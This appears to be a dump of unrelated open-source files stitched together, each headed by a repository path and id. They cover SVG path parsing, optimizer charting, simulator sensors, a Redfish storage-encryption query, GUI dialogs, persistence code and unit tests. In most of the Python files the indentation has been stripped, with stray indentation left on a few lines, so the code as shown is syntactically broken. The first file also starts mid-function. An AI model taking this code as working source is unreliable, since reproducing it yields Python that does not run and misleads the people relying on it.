vertices = self.vertices[-1]
x,y = points[:2]
vertices.append( [x+ox,y+oy] )
self.current = x+ox,y+oy
if len(points[2:]):
self.lineto(points[2:], relative)
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def lineto(self, points, relative = False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,0
vertices = self.vertices[-1]
for i in range(0,len(points),2):
x,y = points[i],points[i+1]
vertices.append( [x+ox,y+oy] )
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def horizontal_lineto(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,self.current[1]
vertices = self.vertices[-1]
x = points[-1]
vertices.append( [x+ox,oy] )
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def vertical_lineto(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = self.current[0],0
vertices = self.vertices[-1]
y = points[-1]
vertices.append( [ox,y+oy] )
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def close(self):
vertices = self.vertices[-1]
vertices.append( vertices[0] )
self.last_control3 = None
self.last_control4 = None
# ---------------------------------
def curveto(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,0
vertices = self.vertices[-1]
x0, y0 = self.current
for i in range(0,len(points),6):
x1,y1 = points[i+0], points[i+1]
x2,y2 = points[i+2], points[i+3]
self.last_control4 = x2,y2
x3,y3 = points[i+4], points[i+5]
V = curves.curve4_bezier((x0+ox,y0+oy),
(x1+ox,y1+oy),
(x2+ox,y2+oy),
(x3+ox,y3+oy))
vertices.extend(V[1:].tolist())
x0,y0 = vertices[-1]
self.current = vertices[-1]
# ---------------------------------
def quadratic_curveto(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,0
vertices = self.vertices[-1]
x0, y0 = self.current
        for i in range(0, len(points), 4):
x1,y1 = points[i+0], points[i+1]
self.last_control3 = x1,y1
x2,y2 = points[i+2], points[i+3]
            V = curves.curve3_bezier((x0+ox,y0+oy),
                                     (x1+ox,y1+oy),
                                     (x2+ox,y2+oy))
vertices.extend(V[1:].tolist())
x0,y0 = vertices[-1]
self.current = vertices[-1]
# ---------------------------------
def smooth_curveto(self, points, relative=False):
        raise NotImplementedError
# ---------------------------------
def smooth_quadratic_curveto(self, points, relative=False):
        raise NotImplementedError
# ---------------------------------
def elliptical_arc(self, points, relative=False):
if relative:
ox,oy = self.current
else:
ox,oy = 0,0
vertices = self.vertices[-1]
x0, y0 = self.current
for i in range(0,len(points),7):
rx = points[i+0]
ry = points[i+1]
angle = np.pi*points[i+2]/180.
large = points[i+3]
sweep = points[i+4]
x2 = points[i+5]
y2 = points[i+6]
V = arc.elliptical_arc(x0, y0, rx, ry, angle, large, sweep, x2+ox, y2+oy)
vertices.extend(V[1:].tolist())
x0,y0 = vertices[-1]
self.current = vertices[-1]
self.last_control3 = None
self.last_control4 = None
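# Minimal usage sketch (an assumption, not part of glumpy): build a closed triangle from
# SVG-style commands; vertices accumulate in path.vertices as lists of [x, y] pairs.
#
#   path = Path()
#   path.svg_parse('M', [0.0, 0.0])
#   path.svg_parse('L', [10.0, 0.0, 10.0, 10.0])
#   path.svg_parse('Z', [])
#   # path.vertices -> [[[0.0, 0.0], [10.0, 0.0], [10.0, 10.0], [0.0, 0.0]]]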
|
examples/utils/visualize/exploration_exploitation_chart.py
|
JokerHB/mealpy
| 162 |
100664
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu" at 11:35, 11/07/2021 %
# %
# Email: <EMAIL> %
# Homepage: https://www.researchgate.net/profile/Nguyen_Thieu2 %
# Github: https://github.com/thieu1995 %
# ------------------------------------------------------------------------------------------------------%
from mealpy.evolutionary_based.GA import BaseGA
from mealpy.utils.visualize import *
from numpy import sum, mean, sqrt
## Define your own fitness function
# Multi-objective but with a single fitness/target value: a weighting method converts the multiple objectives into a single target
def obj_function(solution):
f1 = (sum(solution ** 2) - mean(solution)) / len(solution)
f2 = sum(sqrt(abs(solution)))
f3 = sum(mean(solution ** 2) - solution)
return [f1, f2, f3]
## Setting parameters
verbose = True
epoch = 100
pop_size = 50
lb1 = [-10, -5, -15, -20, -10, -15, -10, -30]
ub1 = [10, 5, 15, 20, 50, 30, 100, 85]
optimizer = BaseGA(obj_function, lb1, ub1, "min", verbose, epoch, pop_size, obj_weight=[0.2, 0.5, 0.3])
best_position, best_fitness, g_best_fit_list, c_best_fit_list = optimizer.train()
print(best_position)
## The idea comes from the paper "On the exploration and exploitation in popular swarm-based metaheuristic algorithms"
# This exploration/exploitation chart should be drawn for a single algorithm and a single fitness function
export_explore_exploit_chart([optimizer.history_list_explore, optimizer.history_list_exploit]) # Draw exploration and exploitation chart
# Parameter for this function
# data: is the list of array
# + optimizer.history_list_explore -> List of exploration percentages
# + optimizer.history_list_exploit -> List of exploitation percentages
# title: title of the figure
# list_legends: list of line's name, default = ("Exploration %", "Exploitation %")
# list_styles: matplotlib API, default = ('-', '-')
# list_colors: matplotlib API, default = ('blue', 'orange')
# x_label: string, default = "#Iteration"
# y_label: string, default = "Percentage"
# filename: string, default = "explore_exploit_chart"
# exts: matplotlib API, default = (".png", ".pdf") --> save figure in format of png and pdf
# verbose: show the figure on Python IDE, default = True
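# For example, a customized call using the keyword parameters documented above could look like
# this (the title/filename values are illustrative, not part of the original example):
#
#   export_explore_exploit_chart([optimizer.history_list_explore, optimizer.history_list_exploit],
#                                title="Exploration vs Exploitation (GA)",
#                                filename="ga_explore_exploit_chart",
#                                verbose=False)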
# This diversity chart should be drawn for multiple algorithms on a single fitness function at the same time to compare the diversity spreading
export_diversity_chart([optimizer.history_list_div], list_legends=['GA']) # Draw diversity measurement chart
# Parameter for this function
# data: is the list of array
# + optimizer1.history_list_div -> List of diversity spreading for this optimizer1
# + optimizer2.history_list_div -> List of diversity spreading for optimizer2
# title: title of the figure
# list_legends: list, e.g. ("GA", "PSO",..)
# list_styles: matplotlib API, default = None
# list_colors: matplotlib API, default = None
# x_label: string, default = "#Iteration"
# y_label: string, default = "Diversity Measurement"
# filename: string, default = "diversity_chart"
# exts: matplotlib API, default = (".png", ".pdf") --> save figure in format of png and pdf
# verbose: show the figure on Python IDE, default = True
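# For example, comparing two algorithms at once could look like this (optimizer2 is hypothetical,
# e.g. a PSO run trained on the same problem; it does not exist in this script):
#
#   export_diversity_chart([optimizer.history_list_div, optimizer2.history_list_div],
#                          list_legends=['GA', 'PSO'])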
|
pypy/tool/isolate_slave.py
|
nanjekyejoannah/pypy
| 381 |
100678
|
import sys, os, imp
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '..', '..')))
from pypy.tool import slaveproc
class IsolateSlave(slaveproc.Slave):
mod = None
def do_cmd(self, cmd):
cmd, data = cmd
if cmd == 'load':
assert self.mod is None
mod = data
if isinstance(mod, str):
mod = __import__(mod, {}, {}, ['__doc__'])
else:
dir, name = mod
file, pathname, description = imp.find_module(name, [dir])
try:
mod = imp.load_module(name, file, pathname, description)
finally:
if file:
file.close()
self.mod = mod
return 'loaded'
elif cmd == 'invoke':
assert self.mod is not None
func, args = data
try:
res = getattr(self.mod, func)(*args)
except KeyboardInterrupt:
raise
except:
exc_type = sys.exc_info()[0]
return ('exc', (exc_type.__module__, exc_type.__name__))
else:
return ('ok', res)
else:
return 'no-clue'
if __name__ == '__main__':
IsolateSlave().do()
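# Protocol sketch inferred from do_cmd() above (module/function names are illustrative):
# the master sends ('load', 'pypy.tool.some_module') or ('load', ('/some/dir', 'some_module'))
# and receives 'loaded'; it then sends ('invoke', ('some_func', (arg1, arg2))) and receives
# either ('ok', result) or ('exc', (exc_module, exc_name)); any other command returns 'no-clue'.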
|
habitat_extensions/sensors.py
|
Felix2048/VLN-CE
| 106 |
100701
|
from copy import deepcopy
from typing import Any
import numpy as np
from gym import Space, spaces
from habitat.config import Config
from habitat.core.registry import registry
from habitat.core.simulator import Sensor, SensorTypes, Simulator
from habitat.sims.habitat_simulator.actions import HabitatSimActions
from habitat.tasks.nav.shortest_path_follower import ShortestPathFollower
from numpy import ndarray
from habitat_extensions.shortest_path_follower import (
ShortestPathFollowerCompat,
)
from habitat_extensions.task import VLNExtendedEpisode
@registry.register_sensor(name="GlobalGPSSensor")
class GlobalGPSSensor(Sensor):
"""Current agent location in global coordinate frame"""
cls_uuid: str = "globalgps"
def __init__(
self, *args: Any, sim: Simulator, config: Config, **kwargs: Any
):
self._sim = sim
self._dimensionality = config.DIMENSIONALITY
super().__init__(config=config)
def _get_uuid(self, *args: Any, **kwargs: Any):
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any):
return SensorTypes.POSITION
def _get_observation_space(self, *args: Any, **kwargs: Any):
return spaces.Box(
low=np.finfo(np.float).min,
high=np.finfo(np.float).max,
shape=(self._dimensionality,),
dtype=np.float,
)
def get_observation(self, *args: Any, **kwargs: Any):
agent_position = self._sim.get_agent_state().position
if self._dimensionality == 2:
agent_position = np.array([agent_position[0], agent_position[2]])
return agent_position.astype(np.float32)
@registry.register_sensor
class VLNOracleProgressSensor(Sensor):
"""Relative progress towards goal"""
cls_uuid: str = "progress"
def __init__(
self, sim: Simulator, config: Config, *args: Any, **kwargs: Any
) -> None:
self._sim = sim
super().__init__(config=config)
def _get_uuid(self, *args: Any, **kwargs: Any) -> str:
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any) -> SensorTypes:
return SensorTypes.MEASUREMENT
def _get_observation_space(self, *args: Any, **kwargs: Any) -> Space:
return spaces.Box(low=0.0, high=1.0, shape=(1,), dtype=np.float)
def get_observation(self, *args: Any, episode, **kwargs: Any) -> float:
distance_to_target = self._sim.geodesic_distance(
self._sim.get_agent_state().position.tolist(),
episode.goals[0].position,
)
# just in case the agent ends up somewhere it shouldn't
if not np.isfinite(distance_to_target):
return np.array([0.0])
distance_from_start = episode.info["geodesic_distance"]
return np.array(
[(distance_from_start - distance_to_target) / distance_from_start]
)
@registry.register_sensor
class AngleFeaturesSensor(Sensor):
"""Returns a fixed array of features describing relative camera poses based
on https://arxiv.org/abs/1806.02724. This encodes heading angles but
assumes a single elevation angle.
"""
cls_uuid: str = "angle_features"
def __init__(self, *args: Any, config: Config, **kwargs: Any) -> None:
self.cameras = config.CAMERA_NUM
super().__init__(config)
orient = [np.pi * 2 / self.cameras * i for i in range(self.cameras)]
self.angle_features = np.stack(
[np.array([np.sin(o), np.cos(o), 0.0, 1.0]) for o in orient]
)
def _get_uuid(self, *args: Any, **kwargs: Any) -> str:
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any) -> SensorTypes:
return SensorTypes.HEADING
def _get_observation_space(self, *args: Any, **kwargs: Any) -> Space:
return spaces.Box(
low=-1.0,
high=1.0,
shape=(self.cameras, 4),
dtype=np.float,
)
def get_observation(self, *args: Any, **kwargs: Any) -> ndarray:
return deepcopy(self.angle_features)
@registry.register_sensor
class ShortestPathSensor(Sensor):
"""Provides the next action to follow the shortest path to the goal."""
cls_uuid: str = "shortest_path_sensor"
def __init__(
self, *args: Any, sim: Simulator, config: Config, **kwargs: Any
):
super().__init__(config=config)
cls = ShortestPathFollower
if config.USE_ORIGINAL_FOLLOWER:
cls = ShortestPathFollowerCompat
self.follower = cls(sim, config.GOAL_RADIUS, return_one_hot=False)
def _get_uuid(self, *args: Any, **kwargs: Any):
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any):
return SensorTypes.TACTILE
def _get_observation_space(self, *args: Any, **kwargs: Any):
return spaces.Box(low=0.0, high=100, shape=(1,), dtype=np.float)
def get_observation(self, *args: Any, episode, **kwargs: Any):
best_action = self.follower.get_next_action(episode.goals[0].position)
if best_action is None:
best_action = HabitatSimActions.STOP
return np.array([best_action])
@registry.register_sensor
class RxRInstructionSensor(Sensor):
"""Loads pre-computed intruction features from disk in the baseline RxR
BERT file format.
https://github.com/google-research-datasets/RxR/tree/7a6b87ba07959f5176aa336192a8c5dc85ca1b8e#downloading-bert-text-features
"""
cls_uuid: str = "rxr_instruction"
def __init__(self, *args: Any, config: Config, **kwargs: Any):
self.features_path = config.features_path
super().__init__(config=config)
def _get_uuid(self, *args: Any, **kwargs: Any) -> str:
return self.cls_uuid
def _get_sensor_type(self, *args: Any, **kwargs: Any):
return SensorTypes.MEASUREMENT
def _get_observation_space(self, *args: Any, **kwargs: Any):
return spaces.Box(
low=np.finfo(np.float).min,
high=np.finfo(np.float).max,
shape=(512, 768),
dtype=np.float,
)
def get_observation(
self, *args: Any, episode: VLNExtendedEpisode, **kwargs
):
features = np.load(
self.features_path.format(
split=episode.instruction.split,
id=int(episode.instruction.instruction_id),
lang=episode.instruction.language.split("-")[0],
)
)
feats = np.zeros((512, 768), dtype=np.float32)
s = features["features"].shape
feats[: s[0], : s[1]] = features["features"]
return feats
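# Note on RxRInstructionSensor.features_path (inferred from get_observation above): the configured
# value is expected to be a format string with {split}, {id} and {lang} placeholders that resolves
# to .npz files containing a "features" array of shape at most (512, 768).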
|
examples/rest-api-python/src/db/notes.py
|
drewfish/serverless-stack
| 5,922 |
100719
|
import time
import numpy
def getNotes():
return {
"id1": {
"noteId": "id1",
"userId": "user1",
"content": str(numpy.array([1,2,3,4])),
"createdAt": int(time.time()),
},
"id2": {
"noteId": "id2",
"userId": "user2",
"content": str(numpy.array([5,6,7,8])),
"createdAt": int(time.time()-1000),
},
}
|
test/com/facebook/buck/core/starlark/rule/testdata/print_works_in_impl/defs.bzl
|
Unknoob/buck
| 8,027 |
100741
|
""" Module docstring """
def _impl(_ctx):
print("printing at debug level")
my_rule = rule(
attrs = {
},
implementation = _impl,
)
|
code/n4_bias_correction.py
|
Delta-Sigma/brain_segmentation
| 315 |
100742
|
from nipype.interfaces.ants import N4BiasFieldCorrection
import sys
import os
import ast
if len(sys.argv) < 3:
print("INPUT from ipython: run n4_bias_correction input_image dimension n_iterations(optional, form:[n_1,n_2,n_3,n_4]) output_image(optional)")
sys.exit(1)
# if output_image is given
if len(sys.argv) > 4:
n4 = N4BiasFieldCorrection(output_image=sys.argv[4])
else:
n4 = N4BiasFieldCorrection()
# dimension of input image, input image
n4.inputs.dimension = int(sys.argv[2])
n4.inputs.input_image = sys.argv[1]
# if n_iterations arg given
if len(sys.argv) > 3:
n4.inputs.n_iterations = ast.literal_eval(sys.argv[3])
n4.run()
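# Example invocation (file names are illustrative):
#   python n4_bias_correction.py subject_t1.nii.gz 3 [50,50,30,20] subject_t1_corrected.nii.gz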
|
promise2012/Vnet/util.py
|
kevin28520/VNet3D
| 121 |
100744
|
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import graph_io
import tensorflow as tf
def convertMetaModelToPbModel(meta_model, pb_model):
# Step 1
# import the model metagraph
saver = tf.train.import_meta_graph(meta_model + '.meta', clear_devices=True)
# make that as the default graph
graph = tf.get_default_graph()
sess = tf.Session()
# now restore the variables
saver.restore(sess, meta_model)
# Step 2
# Find the output name
for op in graph.get_operations():
print(op.name)
# Step 3
output_graph_def = graph_util.convert_variables_to_constants(
sess, # The session
sess.graph_def, # input_graph_def is useful for retrieving the nodes
["Placeholder", "output/Sigmoid"])
# Step 4
# output folder
output_fld = './'
# output pb file name
output_model_file = 'model.pb'
# write the graph
graph_io.write_graph(output_graph_def, pb_model + output_fld, output_model_file, as_text=False)
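# Example call (checkpoint and output paths are illustrative):
#   convertMetaModelToPbModel(meta_model="./checkpoints/Vnet3d.ckpt-20000", pb_model="./")
# This restores the checkpoint, freezes the variables into constants and writes ./model.pb.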
|
small_text/integrations/transformers/__init__.py
|
chschroeder/small-text
| 218 |
100798
|
from small_text.integrations.pytorch.exceptions import PytorchNotFoundError
try:
from small_text.integrations.transformers.datasets import TransformersDataset
from small_text.integrations.transformers.classifiers.classification import (
TransformerModelArguments,
TransformerBasedClassification,
TransformerBasedEmbeddingMixin)
except PytorchNotFoundError:
pass
|
examples/Redfish/get_SmartArray_EncryptionSettings.py
|
andreaslangnevyjel/python-ilorest-library
| 214 |
100825
|
# Copyright 2020 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
"""
An example of gathering the smart array encryption settings on HPE iLO systems
"""
import sys
from redfish import RedfishClient
from redfish.rest.v1 import ServerDownOrUnreachableError
from get_resource_directory import get_resource_directory
def get_SmartArray_EncryptionSettings(_redfishobj, desired_properties):
smartstorage_response = []
smartarraycontrollers = dict()
resource_instances = get_resource_directory(_redfishobj)
if DISABLE_RESOURCE_DIR or not resource_instances:
        #if we do not have a resource directory or want to force its non-use to find the
#relevant URI
systems_uri = _redfishobj.root.obj['Systems']['@odata.id']
systems_response = _redfishobj.get(systems_uri)
systems_members_uri = next(iter(systems_response.obj['Members']))['@odata.id']
systems_members_response = _redfishobj.get(systems_members_uri)
smart_storage_uri = systems_members_response.obj.Oem.Hpe.Links\
['SmartStorage']['@odata.id']
smart_storage_arraycontrollers_uri = _redfishobj.get(smart_storage_uri).obj.Links\
['ArrayControllers']['@odata.id']
smartstorage_response = _redfishobj.get(smart_storage_arraycontrollers_uri).obj['Members']
else:
for instance in resource_instances:
#Use Resource directory to find the relevant URI
if '#HpeSmartStorageArrayControllerCollection.' in instance['@odata.type']:
smartstorage_uri = instance['@odata.id']
smartstorage_response = _redfishobj.get(smartstorage_uri).obj['Members']
break
for controller in smartstorage_response:
smartarraycontrollers[controller['@odata.id']] = _redfishobj.get(controller['@odata.id']).\
obj
sys.stdout.write("Encryption Properties for Smart Storage Array Controller \'%s\' : \n" \
% smartarraycontrollers[controller['@odata.id']].get('Id'))
for data in smartarraycontrollers[controller['@odata.id']]:
if data in desired_properties:
sys.stdout.write("\t %s : %s\n" % (data, smartarraycontrollers[controller\
['@odata.id']].get(data)))
if __name__ == "__main__":
# When running on the server locally use the following commented values
#SYSTEM_URL = None
#LOGIN_ACCOUNT = None
#LOGIN_PASSWORD = <PASSWORD>
# When running remotely connect using the secured (https://) address,
# account name, and password to send https requests
# SYSTEM_URL acceptable examples:
# "https://10.0.0.100"
# "https://ilo.hostname"
SYSTEM_URL = "https://10.0.0.100"
LOGIN_ACCOUNT = "admin"
LOGIN_PASSWORD = "password"
#list of desired properties related to Smart Array controller encryption
DESIRED_PROPERTIES = ["Name", "Model", "SerialNumber", "EncryptionBootPasswordSet",\
"EncryptionCryptoOfficerPasswordSet",\
"EncryptionLocalKeyCacheEnabled", "EncryptionMixedVolumesEnabled",\
"EncryptionPhysicalDriveCount", "EncryptionRecoveryParamsSet",\
"EncryptionStandaloneModeEnabled", "EncryptionUserPasswordSet"]
# flag to force disable resource directory. Resource directory and associated operations are
# intended for HPE servers.
DISABLE_RESOURCE_DIR = False
try:
# Create a Redfish client object
REDFISHOBJ = RedfishClient(base_url=SYSTEM_URL, username=LOGIN_ACCOUNT, \
password=LOGIN_PASSWORD)
# Login with the Redfish client
REDFISHOBJ.login()
except ServerDownOrUnreachableError as excp:
sys.stderr.write("ERROR: server not reachable or does not support RedFish.\n")
sys.exit()
get_SmartArray_EncryptionSettings(REDFISHOBJ, DESIRED_PROPERTIES)
REDFISHOBJ.logout()
|
about.py
|
ardovm/wxGlade
| 225 |
100831
|
"""
About box with general info
@copyright: 2002-2007 <NAME>
@copyright: 2014-2016 <NAME>
@copyright: 2017 <NAME>
@license: MIT (see LICENSE.txt) - THIS PROGRAM COMES WITH NO WARRANTY
"""
import bugdialog
import codecs
import wx
import wx.html
import wx.lib.wxpTag
import config
import misc
import os.path
class wxGladeAboutBox(wx.Dialog):
text = '''
<html>
<body bgcolor="%s">
<!-- <font size="-1"> -->
<center>
<table align="center" border="2" cellspacing="0">
<tr>
<td align="center"><img src="%s">
</td></tr>
<tr><td bgcolor="#000000" align="center">
<font color="#ffffff">Version %s on Python %s and wxPython %s</font>
</td></tr>
</table>
</center>
<!-- </font> -->
<table border="0" cellpadding="0" cellspacing="0">
<tr><td width="50"></td><td>
<!-- <font size="-1"> -->
<b><p>License: MIT (see <a href="show_license">LICENSE.txt</a>)</b><br>
<!-- wxPyColourChooser code copyright (c) 2002-2004 <br><NAME>
(wxWindows license) -->
<p>Home page:
<a href="http://wxglade.sourceforge.net">http://wxglade.sourceforge.net</a>
<p>For credits, see
<a href="show_credits">CREDITS.txt</a>.<!-- </font> --></td>
</tr></table>
</body>
</html>
'''
def __init__(self, parent=None):
wx.Dialog.__init__(self, parent, -1, _('About wxGlade'))
html = wx.html.HtmlWindow(self, -1, size=(480, 250))
html.Bind(wx.html.EVT_HTML_LINK_CLICKED, self.OnLinkClicked)
# it's recommended at least for GTK2 based wxPython
if "gtk2" in wx.PlatformInfo:
html.SetStandardFonts()
bgcolor = misc.color_to_string(self.GetBackgroundColour())
icon_path = os.path.join(config.icons_path, 'wxglade_small.png')
html.SetPage( self.text % (bgcolor, icon_path, config.version, config.py_version, config.wx_version) )
ir = html.GetInternalRepresentation()
ir.SetIndent(0, wx.html.HTML_INDENT_ALL)
html.SetSize((ir.GetWidth(), ir.GetHeight()))
szr = wx.BoxSizer(wx.VERTICAL)
szr.Add(html, 0, wx.TOP|wx.ALIGN_CENTER, 10)
szr.Add(wx.StaticLine(self, -1), 0, wx.LEFT|wx.RIGHT|wx.EXPAND, 20)
szr2 = wx.BoxSizer(wx.HORIZONTAL)
btn = wx.Button(self, wx.ID_OK, _("OK"))
btn.SetDefault()
szr2.Add(btn)
if wx.Platform == '__WXGTK__':
extra_border = 5 # border around a default button
else:
extra_border = 0
szr.Add(szr2, 0, wx.ALL|wx.ALIGN_RIGHT, 20 + extra_border)
self.SetAutoLayout(True)
self.SetSizer(szr)
szr.Fit(self)
self.Layout()
if parent: self.CenterOnParent()
else: self.CenterOnScreen()
def OnLinkClicked(self, event):
href = event.GetLinkInfo().GetHref()
if href == 'show_license':
if config.license_file:
from wx.lib.dialogs import ScrolledMessageDialog
try:
license_file = codecs.open(config.license_file, encoding='UTF-8')
dlg = ScrolledMessageDialog( self, license_file.read(), "wxGlade - License" )
license_file.close()
dlg.ShowModal()
dlg.Destroy()
except EnvironmentError as inst:
bugdialog.ShowEnvironmentError(
_('''Can't read the file "LICENSE.txt".\n\nYou can get a license copy at\n'''
'''http://www.opensource.org/licenses/mit-license.php'''), inst)
else:
wx.MessageBox(_('File "LICENSE.txt" not found!\nYou can get a license copy at\n'
'http://www.opensource.org/licenses/mit-license.php'),
_('Error'), wx.OK | wx.CENTRE | wx.ICON_EXCLAMATION)
elif href == 'show_credits':
if config.credits_file:
from wx.lib.dialogs import ScrolledMessageDialog
try:
credits_file = codecs.open( config.credits_file, encoding='UTF-8' )
dlg = ScrolledMessageDialog( self, credits_file.read(), _("wxGlade - Credits") )
credits_file.close()
dlg.ShowModal()
dlg.Destroy()
except EnvironmentError as inst:
bugdialog.ShowEnvironmentError(_('''Can't read the file "CREDITS.txt"'''), inst)
else:
wx.MessageBox(_('File "CREDITS.txt" not found!'), _('Error'),
wx.OK | wx.CENTRE | wx.ICON_EXCLAMATION)
else:
import webbrowser
webbrowser.open(href, new=True)
|
tests/test_hosts_entry.py
|
mastanpatel/python-hosts
| 102 |
100847
|
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from python_hosts.hosts import HostsEntry
def test_create_ipv4_instance():
""" add an ipv4 type entry """
hosts_entry = HostsEntry(entry_type='ipv4', address='1.2.3.4', names=['example.com', 'example'])
assert hosts_entry.entry_type == 'ipv4'
assert hosts_entry.address == '1.2.3.4'
assert hosts_entry.names == ['example.com', 'example']
def test_str_to_hostentry_ipv4():
str_entry = HostsEntry.str_to_hostentry('10.10.10.10 example.com example.org example')
assert str_entry.entry_type == 'ipv4'
assert str_entry.address == '10.10.10.10'
assert str_entry.names == ['example.com', 'example.org', 'example']
def test_str_to_hostentry_ipv6():
str_entry = HostsEntry.str_to_hostentry('2001:0db8:85a3:0042:1000:8a2e:0370:7334 example.com example')
assert str_entry.entry_type == 'ipv6'
assert str_entry.address == '2001:0db8:85a3:0042:1000:8a2e:0370:7334'
assert str_entry.names == ['example.com', 'example']
def test_str_to_hostentry_returns_fails_with_false():
result = HostsEntry.str_to_hostentry('invalid example.com example')
assert not result
def test_hostentry_repr():
an_entry = HostsEntry(entry_type='ipv4', address='1.2.3.4', comment=None, names=['example.com', 'example.org'])
assert repr(an_entry) == r"HostsEntry(entry_type='ipv4', " \
"address='1.2.3.4', " \
"comment=None, " \
"names=['example.com', 'example.org'])"
def test_hostentry_ipv4_str():
an_entry = HostsEntry(entry_type='ipv4', address='1.2.3.4', comment=None, names=['example.com', 'example.org'])
assert (str(an_entry)) == "TYPE=ipv4, ADDR=1.2.3.4, NAMES=example.com example.org"
def test_hostentry_comment_str():
an_entry = HostsEntry(entry_type='comment', address=None, comment='This is a comment', names=None)
assert (str(an_entry)) == "TYPE = comment, COMMENT = This is a comment"
def test_hostentry_blank_str():
an_entry = HostsEntry(entry_type='blank', address=None, comment=None, names=None)
assert (str(an_entry)) == "TYPE = blank"
|
objectModel/Python/cdm/persistence/syms/manifest_databases_persistence.py
|
rt112000/CDM
| 884 |
100890
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import dateutil.parser
from cdm.enums import CdmObjectType
from cdm.objectmodel import CdmCorpusContext, CdmManifestDefinition
from cdm.persistence import PersistenceLayer
from cdm.utilities import logger, CopyOptions, ResolveOptions, time_utils, copy_data_utils
from . import utils
from .attribute_group_persistence import AttributeGroupPersistence
from .constant_entity_persistence import ConstantEntityPersistence
from .data_type_persistence import DataTypePersistence
from .entity_persistence import EntityPersistence
from .e2e_relationship_persistence import E2ERelationshipPersistence
from .manifest_declaration_persistence import ManifestDeclarationPersistence
from .import_persistence import ImportPersistence
from .local_entity_declaration_persistence import LocalEntityDeclarationPersistence
from .purpose_persistence import PurposePersistence
from .referenced_entity_declaration_persistence import ReferencedEntityDeclarationPersistence
from .trait_persistence import TraitPersistence
from .types import ManifestContent
from cdm.persistence.syms.models import ColumnRelationshipInformation, DataColumn, DataSource, DatabaseEntity, DatabaseProperties, FormatInfo, Namespace, PartitionInfo, PartitionInfoNamespace, PartitionInfoProperties, RelationshipEntity, RelationshipProperties, SASEntityType, ScalarTypeInfo, SchemaEntity, StorageDescriptor, TableEntity, TableNamespace, TablePartitioning, TableProperties, TypeInfo
_TAG = 'ManifestDatabasesPersistence'
class ManifestDatabasesPersistence:
is_persistence_async = False
formats = [PersistenceLayer.MANIFEST_EXTENSION]
@staticmethod
def from_object(ctx: CdmCorpusContext, name: str, namespace: str, path: str,
data_objs: 'SymsDatabasesResponse') -> 'CdmManifestDefinition':
manifest = ctx.corpus.make_object(CdmObjectType.MANIFEST_DEF, name)
manifest.name = name
manifest._folder_path = path
manifest._namespace = namespace
        manifest.explanation = "This manifest contains a list of SyMS databases represented as sub-manifests."
        if len(manifest.imports) == 0 or not any(x.corpus_path == "cdm:/foundations.cdm.json" for x in manifest.imports):
manifest.imports.append("cdm:/foundations.cdm.json")
if data_objs is not None and data_objs.items is not None:
for item in data_objs.items:
database = DatabaseEntity().deserialize(item)
if database.type == SASEntityType.database:
manifest.sub_manifests.append(ManifestDeclarationPersistence.from_data(ctx, database))
return manifest
|
test/test_string_representation.py
|
vladsaveliev/pyensembl
| 162 |
100926
|
from pyensembl import Locus, Gene, ensembl_grch37, Transcript, Exon
from nose.tools import eq_
def test_Locus_string_representation():
locus = Locus("X", 1000, 1010, "+")
string_repr = str(locus)
expected = "Locus(contig='X', start=1000, end=1010, strand='+')"
eq_(string_repr, expected)
def test_Gene_string_representation():
gene = Gene(
gene_id="ENSG0001", gene_name="CAPITALISM",
biotype="protein_coding", contig="Y", start=1, end=5, strand="+",
genome=ensembl_grch37)
string_repr = str(gene)
expected = (
"Gene(gene_id='ENSG0001',"
" gene_name='CAPITALISM',"
" biotype='protein_coding',"
" contig='Y',"
" start=1, end=5, strand='+', genome='GRCh37')")
eq_(string_repr, expected)
def test_Transcript_string_representation():
transcript = Transcript(
transcript_id="ENST0001",
transcript_name="CAPITALISM-001",
gene_id="ENSG0001",
biotype="protein_coding",
contig="Y",
start=1,
end=5,
strand="+",
genome=ensembl_grch37)
expected = (
"Transcript(transcript_id='ENST0001',"
" transcript_name='CAPITALISM-001',"
" gene_id='ENSG0001',"
" biotype='protein_coding',"
" contig='Y',"
" start=1,"
" end=5, strand='+', genome='GRCh37')"
)
string_repr = str(transcript)
eq_(string_repr, expected)
def test_Exon_string_representation():
exon = Exon(
exon_id="ENSE0001",
gene_id="ENSG0001",
gene_name="CAPITALISM",
contig="Y",
start=1,
end=5,
strand="+")
expected = (
"Exon(exon_id='ENSE0001',"
" gene_id='ENSG0001',"
" gene_name='CAPITALISM',"
" contig='Y',"
" start=1,"
" end=5, strand='+')"
)
string_repr = str(exon)
eq_(string_repr, expected)
|
torchgeo/trainers/utils.py
|
khlaifiabilel/torchgeo
| 678 |
100935
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""Common trainer utilities."""
import warnings
from collections import OrderedDict
from typing import Dict, Optional, Tuple, Union
import torch
import torch.nn as nn
from torch import Tensor
from torch.nn.modules import Conv2d, Module
# https://github.com/pytorch/pytorch/issues/60979
# https://github.com/pytorch/pytorch/pull/61045
Module.__module__ = "nn.Module"
Conv2d.__module__ = "nn.Conv2d"
